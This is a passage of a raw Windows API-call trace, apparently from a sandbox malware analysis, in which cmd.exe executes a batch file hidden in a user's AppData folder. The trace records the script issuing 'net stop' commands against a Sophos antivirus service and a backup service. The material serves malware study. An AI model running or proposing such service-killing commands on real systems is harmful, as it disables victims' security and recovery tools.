FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0043.055] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0043.055] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0043.055] GetLastError () returned 0x2 [0043.055] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0043.055] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0043.055] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0043.055] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0043.055] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0043.055] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0043.056] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0043.056] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop ΓÇ£Sophos Health ServiceΓÇ¥ /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop ΓÇ£Sophos Health ServiceΓÇ¥ /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop ΓÇ£Sophos Health ServiceΓÇ¥ /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x7b4, dwThreadId=0x7a0)) returned 1 [0043.059] CloseHandle (hObject=0x74) returned 1 [0043.059] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0043.059] GetProcessHeap () returned 0x3e0000 [0043.059] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0043.059] GetEnvironmentStringsW () returned 0x3f8408* [0043.060] GetProcessHeap () returned 0x3e0000 [0043.060] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0043.060] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0043.060] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0043.497] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x1) returned 1 [0043.497] CloseHandle (hObject=0x78) returned 1 [0043.497] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000001") returned 8 [0043.497] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0043.497] GetProcessHeap () returned 0x3e0000 [0043.497] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0043.497] GetEnvironmentStringsW () returned 0x3f8408* [0043.497] GetProcessHeap () returned 0x3e0000 [0043.497] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0043.497] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0043.497] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0043.497] GetProcessHeap () returned 0x3e0000 [0043.497] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0043.497] GetEnvironmentStringsW () returned 0x3f8408* [0043.497] GetProcessHeap () returned 0x3e0000 [0043.497] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0043.497] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0043.497] GetProcessHeap () returned 0x3e0000 [0043.497] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0043.497] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0043.497] _get_osfhandle (_FileHandle=1) returned 0x264 [0043.497] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0043.498] _get_osfhandle (_FileHandle=1) returned 0x264 [0043.498] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0043.498] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0043.498] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0043.498] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0043.498] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0043.498] SetConsoleInputExeNameW () returned 0x1 [0043.498] GetConsoleOutputCP () returned 0x1b5 [0043.499] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0043.499] SetThreadUILanguage (LangId=0x0) returned 0x409 [0043.499] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0043.499] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0043.499] _get_osfhandle (_FileHandle=3) returned 0x78 [0043.499] SetFilePointer (in: hFile=0x78, lDistanceToMove=1762, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6e2 [0043.499] GetProcessHeap () returned 0x3e0000 [0043.499] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0043.499] GetProcessHeap () returned 0x3e0000 [0043.499] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0043.499] GetProcessHeap () returned 0x3e0000 [0043.499] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0043.499] GetProcessHeap () returned 0x3e0000 [0043.499] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0043.499] GetProcessHeap () returned 0x3e0000 [0043.499] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcaf0 | out: hHeap=0x3e0000) returned 1 [0043.499] GetProcessHeap () returned 0x3e0000 [0043.499] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0043.499] GetProcessHeap () returned 0x3e0000 [0043.499] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0043.499] GetProcessHeap () returned 0x3e0000 [0043.499] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0043.499] GetProcessHeap () returned 0x3e0000 [0043.499] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0043.499] GetProcessHeap () returned 0x3e0000 [0043.499] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0043.499] GetProcessHeap () returned 0x3e0000 [0043.499] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0043.499] GetProcessHeap () returned 0x3e0000 [0043.500] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0043.500] GetProcessHeap () returned 0x3e0000 [0043.500] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0043.500] _get_osfhandle (_FileHandle=3) returned 0x78 [0043.500] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6e2 [0043.500] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x11df, lpOverlapped=0x0) returned 1 [0043.500] SetFilePointer (in: hFile=0x78, lDistanceToMove=1781, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6f5 [0043.500] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=19, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop bedbg /y\r\nHealth ServiceΓÇ¥ /y\r\ny\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 19 [0043.500] _get_osfhandle (_FileHandle=3) returned 0x78 [0043.500] GetFileType (hFile=0x78) returned 0x1 [0043.500] _get_osfhandle (_FileHandle=3) returned 0x78 [0043.500] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6f5 [0043.500] GetProcessHeap () returned 0x3e0000 [0043.500] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0043.500] GetProcessHeap () returned 0x3e0000 [0043.500] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0043.501] _tell (_FileHandle=3) returned 1781 [0043.501] _close (_FileHandle=3) returned 0 [0043.501] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0043.501] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0043.501] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0043.501] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0043.501] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0043.501] _wcsicmp (_String1="net", _String2="CD") returned 11 [0043.501] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0043.501] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0043.501] _wcsicmp (_String1="net", _String2="REN") returned -4 [0043.501] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0043.501] _wcsicmp (_String1="net", _String2="SET") returned -5 [0043.501] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0043.501] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0043.501] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0043.501] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0043.501] _wcsicmp (_String1="net", _String2="MD") returned 1 [0043.501] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0043.501] _wcsicmp (_String1="net", _String2="RD") returned -4 [0043.501] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0043.501] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0043.502] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0043.502] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0043.502] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0043.502] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0043.502] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0043.502] _wcsicmp (_String1="net", _String2="VER") returned -8 [0043.502] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0043.502] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0043.502] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0043.502] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0043.502] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0043.502] _wcsicmp (_String1="net", _String2="START") returned -5 [0043.502] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0043.502] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0043.502] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0043.502] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0043.502] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0043.502] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0043.502] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0043.502] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0043.502] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0043.502] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0043.502] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0043.502] SetErrorMode (uMode=0x0) returned 0x1 [0043.503] GetProcessHeap () returned 0x3e0000 [0043.503] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0043.503] GetProcessHeap () returned 0x3e0000 [0043.503] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0043.503] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0043.503] GetProcessHeap () returned 0x3e0000 [0043.503] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0043.503] GetProcessHeap () returned 0x3e0000 [0043.503] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0043.503] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0043.503] GetProcessHeap () returned 0x3e0000 [0043.503] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0043.503] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0043.503] GetProcessHeap () returned 0x3e0000 [0043.503] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0043.503] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0043.503] GetProcessHeap () returned 0x3e0000 [0043.503] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0043.503] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.503] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0043.504] GetLastError () returned 0x2 [0043.504] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0043.504] GetLastError () returned 0x2 [0043.504] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.504] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0043.504] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0043.504] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0043.504] GetLastError () returned 0x2 [0043.504] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0043.504] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0043.505] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0043.505] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0043.505] SetErrorMode (uMode=0x0) returned 0x1 [0043.505] GetProcessHeap () returned 0x3e0000 [0043.505] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0043.505] GetProcessHeap () returned 0x3e0000 [0043.505] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0043.505] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0043.505] GetProcessHeap () returned 0x3e0000 [0043.505] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0043.505] GetProcessHeap () returned 0x3e0000 [0043.505] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0043.505] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0043.505] GetProcessHeap () returned 0x3e0000 [0043.505] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0043.505] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0043.505] GetProcessHeap () returned 0x3e0000 [0043.505] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0043.505] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0043.505] GetProcessHeap () returned 0x3e0000 [0043.505] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0043.505] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.505] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0043.506] GetLastError () returned 0x2 [0043.506] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0043.506] GetLastError () returned 0x2 [0043.506] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.506] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0043.506] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0043.506] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0043.506] GetLastError () returned 0x2 [0043.506] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0043.506] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0043.506] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0043.507] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0043.507] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0043.507] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0043.507] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0043.507] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop bedbg /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop bedbg /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop bedbg /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x834, dwThreadId=0x6f8)) returned 1 [0043.510] CloseHandle (hObject=0x78) returned 1 [0043.510] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0043.511] GetProcessHeap () returned 0x3e0000 [0043.511] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0043.511] GetEnvironmentStringsW () returned 0x3f8408* [0043.511] GetProcessHeap () returned 0x3e0000 [0043.511] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0043.511] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0043.511] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0043.836] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0043.836] CloseHandle (hObject=0x74) returned 1 [0043.836] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0043.836] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0043.836] GetProcessHeap () returned 0x3e0000 [0043.836] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0043.836] GetEnvironmentStringsW () returned 0x3f8408* [0043.836] GetProcessHeap () returned 0x3e0000 [0043.836] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0043.836] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0043.836] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0043.836] GetProcessHeap () returned 0x3e0000 [0043.836] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0043.837] GetEnvironmentStringsW () returned 0x3f8408* [0043.837] GetProcessHeap () returned 0x3e0000 [0043.837] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0043.837] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0043.837] GetProcessHeap () returned 0x3e0000 [0043.837] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0043.837] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0043.837] _get_osfhandle (_FileHandle=1) returned 0x264 [0043.837] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0043.837] _get_osfhandle (_FileHandle=1) returned 0x264 [0043.837] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0043.837] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0043.837] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0043.837] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0043.837] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0043.838] SetConsoleInputExeNameW () returned 0x1 [0043.838] GetConsoleOutputCP () returned 0x1b5 [0043.838] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0043.838] SetThreadUILanguage (LangId=0x0) returned 0x409 [0043.838] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0043.838] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0043.838] _get_osfhandle (_FileHandle=3) returned 0x74 [0043.838] SetFilePointer (in: hFile=0x74, lDistanceToMove=1781, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6f5 [0043.838] GetProcessHeap () 